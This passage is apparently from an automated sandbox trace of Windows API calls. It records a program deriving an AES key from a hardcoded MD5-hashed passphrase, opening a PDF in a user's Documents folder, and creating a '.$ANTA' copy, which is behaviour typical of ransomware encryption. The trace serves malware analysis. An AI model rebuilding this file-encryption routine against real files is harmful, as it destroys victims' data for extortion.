lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0079.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0079.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0079.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0079.059] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0079.061] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0079.061] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.062] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0079.062] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.062] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cac10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0079.062] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0079.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.062] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0079.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cafa0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0079.063] CryptHashData (hHash=0x41ac640, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0079.063] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.063] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caec8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0079.063] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac000) returned 1 [0079.063] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0079.063] CryptDestroyHash (hHash=0x41ac640) returned 1 [0079.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0079.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.064] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0079.064] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0079.065] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.065] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\eY_Dc1TDsg.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ey_dc1tdsg.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0079.065] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.065] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0079.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.066] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0079.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0079.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0079.066] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0079.066] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0079.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0079.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dcf8 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0079.068] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0079.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0079.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.069] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\eY_Dc1TDsg.pdf.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ey_dc1tdsg.pdf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0079.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0079.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0079.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.069] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0079.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0079.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.070] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0079.070] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.070] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0079.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0079.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0079.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e04020 [0079.074] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0079.074] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0xba63, lpOverlapped=0x0) returned 1 [0079.076] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, 